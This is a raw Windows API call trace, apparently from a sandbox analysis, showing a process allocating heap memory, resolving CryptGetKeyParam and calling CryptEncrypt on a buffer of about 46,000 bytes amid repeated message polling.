1 [0189.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0189.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0189.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.714] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.715] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0189.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.716] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.717] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.717] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.717] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.717] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.717] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.719] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb4e0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb4f0) returned 1 [0189.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.719] CharLowerBuffW (in: lpsz="byte[46321]", cchLength=0xb | out: lpsz="byte[46321]") returned 0xb [0189.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.721] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.722] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb4e0, dwBufLen=0xb4f0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb4f0) returned 1 [0189.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.722] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.724] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.724] 